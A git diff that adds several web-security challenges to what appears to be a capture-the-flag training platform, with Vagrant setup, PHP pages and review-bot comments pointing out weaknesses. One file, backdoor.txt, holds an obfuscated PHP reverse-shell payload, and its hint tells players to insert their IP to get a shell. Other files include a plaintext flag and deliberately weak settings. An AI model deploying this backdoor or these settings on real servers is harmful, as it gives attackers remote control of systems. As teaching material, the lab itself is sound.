@@ -0,0 +1,86 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+ config.vm.provision "shell",
+ inline: "sudo php /var/www/html/setup_db/setup-db.php"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
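Review bot: The `forwarded_port` line sets no `host_ip`, so depending on the Vagrant version and provider the guest's port 80 may be published on every interface of the host, and this guest is a deliberately vulnerable web server. Binding it to loopback keeps the challenge reachable only from the machine running it: `config.vm.network "forwarded_port", guest: 80, host: 8008, host_ip: "127.0.0.1"`. The `chmod -R 777 /var/www/html` provisioner also makes the whole linked project tree world-writable inside the guest; if the challenge only needs the web server to write to one directory, scope the mode change to that directory. The same two lines appear in the ch046 and ch048 Vagrantfiles further down this diff. The comment above the mapping still says "localhost:8080" while the mapping uses 8008.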
diff --git a/challenges/ch045/index.php b/challenges/ch045/index.php
new file mode 100755
index 00000000..8413b845
--- /dev/null
+++ b/challenges/ch045/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch045/inside/backdoor.txt b/challenges/ch045/inside/backdoor.txt
new file mode 100755
index 00000000..344e9f67
--- /dev/null
+++ b/challenges/ch045/inside/backdoor.txt
@@ -0,0 +1 @@
+eval(base64_decode(urldecode("%4c%79%6f%38%50%33%42%6f%63%43%41%76%4b%69%6f%76%49%47%56%79%63%6d%39%79%58%33%4a%6c%63%47%39%79%64%47%6c%75%5a%79%67%77%4b%54%73%67%4a%47%6c%77%49%44%30%67%4a%7a%45%77%4c%6a%51%75%4d%54%49%75%4e%53%63%37%49%43%52%77%62%33%4a%30%49%44%30%67%4e%44%51%30%4e%44%73%67%61%57%59%67%4b%43%67%6b%5a%69%41%39%49%43%64%7a%64%48%4a%6c%59%57%31%66%63%32%39%6a%61%32%56%30%58%32%4e%73%61%57%56%75%64%43%63%70%49%43%59%6d%49%47%6c%7a%58%32%4e%68%62%47%78%68%59%6d%78%6c%4b%43%52%6d%4b%53%6b%67%65%79%41%6b%63%79%41%39%49%43%52%6d%4b%43%4a%30%59%33%41%36%4c%79%39%37%4a%47%6c%77%66%54%70%37%4a%48%42%76%63%6e%52%39%49%69%6b%37%49%43%52%7a%58%33%52%35%63%47%55%67%50%53%41%6e%63%33%52%79%5a%57%46%74%4a%7a%73%67%66%53%42%6c%62%48%4e%6c%61%57%59%67%4b%43%67%6b%5a%69%41%39%49%43%64%6d%63%32%39%6a%61%32%39%77%5a%57%34%6e%4b%53%41%6d%4a%69%42%70%63%31%39%6a%59%57%78%73%59%57%4a%73%5a%53%67%6b%5a%69%6b%70%49%48%73%67%4a%48%4d%67%50%53%41%6b%5a%69%67%6b%61%58%41%73%49%43%52%77%62%33%4a%30%4b%54%73%67%4a%48%4e%66%64%48%6c%77%5a%53%41%39%49%43%64%7a%64%48%4a%6c%59%57%30%6e%4f%79%42%39%49%47%56%73%63%32%56%70%5a%69%41%6f%4b%43%52%6d%49%44%30%67%4a%33%4e%76%59%32%74%6c%64%46%39%6a%63%6d%56%68%64%47%55%6e%4b%53%41%6d%4a%69%42%70%63%31%39%6a%59%57%78%73%59%57%4a%73%5a%53%67%6b%5a%69%6b%70%49%48%73%67%4a%48%4d%67%50%53%41%6b%5a%69%68%42%52%6c%39%4a%54%6b%56%55%4c%43%42%54%54%30%4e%4c%58%31%4e%55%55%6b%56%42%54%53%77%67%55%30%39%4d%58%31%52%44%55%43%6b%37%49%43%52%79%5a%58%4d%67%50%53%42%41%63%32%39%6a%61%32%56%30%58%32%4e%76%62%6d%35%6c%59%33%51%6f%4a%48%4d%73%49%43%52%70%63%43%77%67%4a%48%42%76%63%6e%51%70%4f%79%42%70%5a%69%41%6f%49%53%52%79%5a%58%4d%70%49%48%73%67%5a%47%6c%6c%4b%43%6b%37%49%48%30%67%4a%48%4e%66%64%48%6c%77%5a%53%41%39%49%43%64%7a%62%32%4e%72%5a%58%51%6e%4f%79%42%39%49%47%56%73%63%32%55%67%65%79%42%6b%61%57%55%6f%4a%32%35%76%49%48%4e%76%59%32%74%6c%64%43%42%6d%64%57%35%6a%63%79%63%70%4f%79%42%39%49%47%6c%6d%49%43%67%68%4a%48%4d%70%49%48%73%67%5a%47%6c%6c%
4b%43%64%75%62%79%42%7a%62%32%4e%72%5a%58%51%6e%4b%54%73%67%66%53%42%7a%64%32%6c%30%59%32%67%67%4b%43%52%7a%58%33%52%35%63%47%55%70%49%48%73%67%59%32%46%7a%5a%53%41%6e%63%33%52%79%5a%57%46%74%4a%7a%6f%67%4a%47%78%6c%62%69%41%39%49%47%5a%79%5a%57%46%6b%4b%43%52%7a%4c%43%41%30%4b%54%73%67%59%6e%4a%6c%59%57%73%37%49%47%4e%68%63%32%55%67%4a%33%4e%76%59%32%74%6c%64%43%63%36%49%43%52%73%5a%57%34%67%50%53%42%7a%62%32%4e%72%5a%58%52%66%63%6d%56%68%5a%43%67%6b%63%79%77%67%4e%43%6b%37%49%47%4a%79%5a%57%46%72%4f%79%42%39%49%47%6c%6d%49%43%67%68%4a%47%78%6c%62%69%6b%67%65%79%42%6b%61%57%55%6f%4b%54%73%67%66%53%41%6b%59%53%41%39%49%48%56%75%63%47%46%6a%61%79%67%69%54%6d%78%6c%62%69%49%73%49%43%52%73%5a%57%34%70%4f%79%41%6b%62%47%56%75%2e%49%44%30%67%4a%47%46%62%4a%32%78%6c%62%69%64%64%4f%79%41%6b%59%69%41%39%49%43%63%6e%4f%79%42%33%61%47%6c%73%5a%53%41%6f%63%33%52%79%62%47%56%75%4b%43%52%69%4b%53%41%38%49%43%52%73%5a%57%34%70%49%48%73%67%63%33%64%70%64%47%4e%6f%49%43%67%6b%63%31%39%30%65%58%42%6c%4b%53%42%37%49%47%4e%68%63%32%55%67%4a%33%4e%30%63%6d%56%68%62%53%63%36%49%43%52%69%49%43%34%39%49%47%5a%79%5a%57%46%6b%4b%43%52%7a%4c%43%41%6b%62%47%56%75%4c%58%4e%30%63%6d%78%6c%62%69%67%6b%59%69%6b%70%4f%79%42%69%63%6d%56%68%61%7a%73%67%59%32%46%7a%5a%53%41%6e%63%32%39%6a%61%32%56%30%4a%7a%6f%67%4a%47%49%67%4c%6a%30%67%63%32%39%6a%61%32%56%30%58%33%4a%6c%59%57%51%6f%4a%48%4d%73%49%43%52%73%5a%57%34%74%63%33%52%79%62%47%56%75%4b%43%52%69%4b%53%6b%37%49%47%4a%79%5a%57%46%72%4f%79%42%39%49%48%30%67%4a%45%64%4d%54%30%4a%42%54%46%4e%62%4a%32%31%7a%5a%33%4e%76%59%32%73%6e%58%53%41%39%49%43%52%7a%4f%79%41%6b%52%30%78%50%51%6b%46%4d%55%31%73%6e%62%58%4e%6e%63%32%39%6a%61%31%39%30%65%58%42%6c%4a%31%30%67%50%53%41%6b%63%31%39%30%65%58%42%6c%4f%79%42%6c%64%6d%46%73%4b%43%52%69%4b%54%73%67%5a%47%6c%6c%4b%43%6b%37")));
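Review bot: Nothing in `backdoor.txt` or in the visible parts of this commit marks the file as a deliberate training artifact. It is a single `eval(base64_decode(urldecode(...)))` statement, a layering that webshell scanners and endpoint protection commonly match on, so clones of the repository may be quarantined or reported as compromised. A short README beside it (for example in `challenges/ch045/`) stating that the payload is intentional and is only meant to be used inside the isolated challenge VM would let responders triage such a hit quickly. Since a comment inside the file would change the challenge itself, the label belongs next to the file rather than in it.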
diff --git a/challenges/ch045/inside/iepngfix.htc b/challenges/ch045/inside/iepngfix.htc
new file mode 100755
index 00000000..54961f9b
--- /dev/null
+++ b/challenges/ch045/inside/iepngfix.htc
@@ -0,0 +1,103 @@
+
+
+
+
+
diff --git a/challenges/ch045/inside/iepngfix.php b/challenges/ch045/inside/iepngfix.php
new file mode 100755
index 00000000..6b735c77
--- /dev/null
+++ b/challenges/ch045/inside/iepngfix.php
@@ -0,0 +1,9 @@
+
\ No newline at end of file
diff --git a/challenges/ch045/inside/images/school.jpg b/challenges/ch045/inside/images/school.jpg
new file mode 100755
index 00000000..89a1c44b
Binary files /dev/null and b/challenges/ch045/inside/images/school.jpg differ
diff --git a/challenges/ch045/inside/images/schools.jpg b/challenges/ch045/inside/images/schools.jpg
new file mode 100755
index 00000000..ea701f10
Binary files /dev/null and b/challenges/ch045/inside/images/schools.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg b/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg
new file mode 100755
index 00000000..7f4758c0
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_bottom_panel_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_comment_icon.gif b/challenges/ch045/inside/images/templatemo_comment_icon.gif
new file mode 100755
index 00000000..90e43d1a
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_comment_icon.gif differ
diff --git a/challenges/ch045/inside/images/templatemo_comment_icon.png b/challenges/ch045/inside/images/templatemo_comment_icon.png
new file mode 100755
index 00000000..bb636fcc
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_comment_icon.png differ
diff --git a/challenges/ch045/inside/images/templatemo_content_bg.jpg b/challenges/ch045/inside/images/templatemo_content_bg.jpg
new file mode 100755
index 00000000..c45a0edb
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_content_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_date_bg.png b/challenges/ch045/inside/images/templatemo_date_bg.png
new file mode 100755
index 00000000..2415888b
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_date_bg.png differ
diff --git a/challenges/ch045/inside/images/templatemo_header_bg.jpg b/challenges/ch045/inside/images/templatemo_header_bg.jpg
new file mode 100755
index 00000000..beef9f03
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_header_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg b/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg
new file mode 100755
index 00000000..70bf2af5
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_header_bg_blank.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_image_01.jpg b/challenges/ch045/inside/images/templatemo_image_01.jpg
new file mode 100755
index 00000000..1f5d236f
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_image_01.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_image_02.jpg b/challenges/ch045/inside/images/templatemo_image_02.jpg
new file mode 100755
index 00000000..ecdf43ae
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_image_02.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg b/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg
new file mode 100755
index 00000000..e3ca88ca
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_left_column_title_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_menu_bg.jpg b/challenges/ch045/inside/images/templatemo_menu_bg.jpg
new file mode 100755
index 00000000..1dd8d5a2
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_menu_bg.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_01.jpg b/challenges/ch045/inside/images/templatemo_thumb_01.jpg
new file mode 100755
index 00000000..2df39773
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_01.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_02.jpg b/challenges/ch045/inside/images/templatemo_thumb_02.jpg
new file mode 100755
index 00000000..569df17e
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_02.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_03.jpg b/challenges/ch045/inside/images/templatemo_thumb_03.jpg
new file mode 100755
index 00000000..346e5f3d
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_03.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_04.jpg b/challenges/ch045/inside/images/templatemo_thumb_04.jpg
new file mode 100755
index 00000000..05db1bff
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_04.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_05.jpg b/challenges/ch045/inside/images/templatemo_thumb_05.jpg
new file mode 100755
index 00000000..629b5865
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_05.jpg differ
diff --git a/challenges/ch045/inside/images/templatemo_thumb_06.jpg b/challenges/ch045/inside/images/templatemo_thumb_06.jpg
new file mode 100755
index 00000000..ca3b599e
Binary files /dev/null and b/challenges/ch045/inside/images/templatemo_thumb_06.jpg differ
diff --git a/challenges/ch045/inside/index.php b/challenges/ch045/inside/index.php
new file mode 100755
index 00000000..33466918
--- /dev/null
+++ b/challenges/ch045/inside/index.php
@@ -0,0 +1,194 @@
+
+
+
+
+Paint Blog Template - free CSS template
+
+
+
+
+
+
This is a free CSS template provided by TemplateMo.com website. You may download, modify and apply this CSS layout for your personal or business websites.
+
Credit goes to photovaco.com for photos. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus nec dui. Donec nec neque ut quam sodales feugiat. Nam vehicula dapibus lectus. Integer imperdiet pretium dolor. Vivamus felis. Vivamus vulputate vehicula mi.
+
Maecenas consectetur purus. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
This blog layout is a free CSS template provided by TemplateMo.com website. You may download, modify and apply this CSS layout for your personal or business websites.
+
Credit goes to photovaco.com for photos. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus nec dui. Donec nec neque ut quam sodales feugiat. Nam vehicula dapibus lectus. Integer imperdiet pretium dolor.
+
Vivamus felis. Vivamus vulputate vehicula mi. Maecenas consectetur purus. Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus. Sed ultrices. Lorem ipsum dolor sit amet, consectetuer adipiscing elit
+
+
+
+
+
Comments
+
+
1. Phasellus ultrices justo
+
+ Donec scelerisque. Integer ultrices. Donec hendrerit. Maecenas nisl ante, mollis et, tincidunt vitae, feugiat sit amet, mi. Vestibulum urna. Vivamus eu tortor.
+
+
+
+
2. Vivamus vestibulum
+
+ Aliquam tristique lacus in sapien. Suspendisse potenti. Ut sed pede. Nullam vitae tellus.
+
+
+Hints /Tips & Rules :
+Play with inputs, notice the changes carefully on the web page. You would have to analyse the backdoor that is weakly encrypted, and enter ur ip address in the payload for getting reverse connection or for accessing the server system. ".txt" cannot be executed so, might have to play with some extensions For better understanding, go through these references reference1 reference2
+]]>
+
+
+
diff --git a/challenges/ch045/setup_db/db-creds.inc b/challenges/ch045/setup_db/db-creds.inc
new file mode 100755
index 00000000..dd88e1d1
--- /dev/null
+++ b/challenges/ch045/setup_db/db-creds.inc
@@ -0,0 +1,9 @@
+
+
diff --git a/challenges/ch045/setup_db/setup-db.php b/challenges/ch045/setup_db/setup-db.php
new file mode 100755
index 00000000..f214bbb8
--- /dev/null
+++ b/challenges/ch045/setup_db/setup-db.php
@@ -0,0 +1,103 @@
+
+
+
+
+Welcome To The World of Pentesters !
+
+
+
+
+
+Welcome
+
+
+
+
+
+
+
Wait a bit.. Setting up database !
+
+
+
+";
+
+
+
+$con = mysql_connect($host,$dbuser,$dbpass);
+if (!$con)
+ {
+ die('Could not connect to DB, check the creds in db-creds.inc: ' . mysql_error());
+ }
+
+
+
+
+//@mysql_select_db('mysql',$con)
+
+//purging Old Database
+ $sql="DROP DATABASE IF EXISTS TripDawki";
+ if (mysql_query($sql))
+ {echo "Old database 'TripDawki' purged if exists"; echo "
\n";}
+
+
+
+//including the Challenges DB creation file.
+?>
+
+
+
+
+
+
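Review bot: This setup script issues `DROP DATABASE IF EXISTS TripDawki` and sits under the document root (the ch045 Vagrantfile links the project directory to `/var/www/html` and runs `php /var/www/html/setup_db/setup-db.php`), yet no check in the surviving lines restricts it to the command line, so any visitor requesting it over HTTP could apparently reset the challenge for everyone. A guard at the top such as `if (PHP_SAPI !== 'cli') { http_response_code(403); exit; }` would keep provisioning working while closing that path. The `die(... . mysql_error())` call also sends the driver's error text to the client, and the `mysql_*` functions used here were removed in PHP 7.0, so the script fails outright on a current interpreter; `mysqli` or PDO is the replacement. Parts of this file are missing from the page, so an existing guard may simply not be visible.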
diff --git a/challenges/ch045/setup_db/sql-connect.php b/challenges/ch045/setup_db/sql-connect.php
new file mode 100755
index 00000000..4570d963
--- /dev/null
+++ b/challenges/ch045/setup_db/sql-connect.php
@@ -0,0 +1,20 @@
+
+
+
+
+
+
diff --git a/challenges/ch046/E'PL.txt b/challenges/ch046/E'PL.txt
new file mode 100755
index 00000000..67b52b3a
--- /dev/null
+++ b/challenges/ch046/E'PL.txt
@@ -0,0 +1,3 @@
+flag is : thenew_flag
+
+//have to encrypt this later...
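Review bot: The flag is committed in plaintext together with a `//have to encrypt this later...` reminder, and the file lives in the directory that the ch046 Vagrantfile links to `/var/www/html`, so it is presumably retrievable with a plain GET once its name is known, without solving the challenge. Either keep the flag outside the document root or resolve the reminder before merging. The reminder line should also be dropped from the shipped file, since it is otherwise part of the text a player reads as the flag file.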
diff --git a/challenges/ch046/Vagrantfile b/challenges/ch046/Vagrantfile
new file mode 100755
index 00000000..feefb34a
--- /dev/null
+++ b/challenges/ch046/Vagrantfile
@@ -0,0 +1,84 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch046/index.php b/challenges/ch046/index.php
new file mode 100755
index 00000000..5417aaeb
--- /dev/null
+++ b/challenges/ch046/index.php
@@ -0,0 +1,27 @@
+
+
+
+OS Command Injection
+
+
+
diff --git a/challenges/ch046/newchallenge6.xml b/challenges/ch046/newchallenge6.xml
new file mode 100755
index 00000000..e83553f8
--- /dev/null
+++ b/challenges/ch046/newchallenge6.xml
@@ -0,0 +1,22 @@
+
+
+ New Challenge 6
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Rajat Moury
+ Alexandros Papanikolaou
+
+ web
+
+
+
+Hints /Tips & Rules :
+Play with inputs, notice the changes carefully, Intercept the requests and responses passed between browser and web-server. You are not allowed to see the php files before cracking the challenge. reference1 reference2
+]]>
+
+
+
diff --git a/challenges/ch046/robots.txt b/challenges/ch046/robots.txt
new file mode 100755
index 00000000..95ce820a
--- /dev/null
+++ b/challenges/ch046/robots.txt
@@ -0,0 +1,5 @@
+User-agent: *
+Disallow: /test/ad_min.php
+
+User-agent: *
+Disallow: /Important_Files
diff --git a/challenges/ch048/Vagrantfile b/challenges/ch048/Vagrantfile
new file mode 100755
index 00000000..91e41402
--- /dev/null
+++ b/challenges/ch048/Vagrantfile
@@ -0,0 +1,88 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "echo 'admin_itis' | sudo htpasswd -c -i /etc/apache2/.htpasswd1 admin"
+ config.vm.provision "shell",
+ inline: "sudo cp -f /var/www/html/dir/apache2.conf /etc/apache2/"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch048/ctf.jpg b/challenges/ch048/ctf.jpg
new file mode 100755
index 00000000..a31efcdf
Binary files /dev/null and b/challenges/ch048/ctf.jpg differ
diff --git a/challenges/ch048/dir/.htaccess b/challenges/ch048/dir/.htaccess
new file mode 100755
index 00000000..f97554b1
--- /dev/null
+++ b/challenges/ch048/dir/.htaccess
@@ -0,0 +1,8 @@
+AuthType Basic
+AuthName "Protected Area !!"
+AuthUserFile /etc/apache2/.htpasswd1
+
+
+Require user admin
+
+
diff --git a/challenges/ch048/dir/apache2.conf b/challenges/ch048/dir/apache2.conf
new file mode 100755
index 00000000..0f4885e4
--- /dev/null
+++ b/challenges/ch048/dir/apache2.conf
@@ -0,0 +1,221 @@
+# This is the main Apache server configuration file. It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+# /etc/apache2/
+# |-- apache2.conf
+# | `-- ports.conf
+# |-- mods-enabled
+# | |-- *.load
+# | `-- *.conf
+# |-- conf-enabled
+# | `-- *.conf
+# `-- sites-enabled
+# `-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+# together by including all remaining configuration files when starting up the
+# web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+# supposed to determine listening ports for incoming connections which can be
+# customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+# directories contain particular configuration snippets which manage modules,
+# global configuration fragments, or virtual host configurations,
+# respectively.
+#
+# They are activated by symlinking available configuration files from their
+# respective *-available/ counterparts. These should be managed by using our
+# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+# their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+# the default configuration, apache2 needs to be started/stopped with
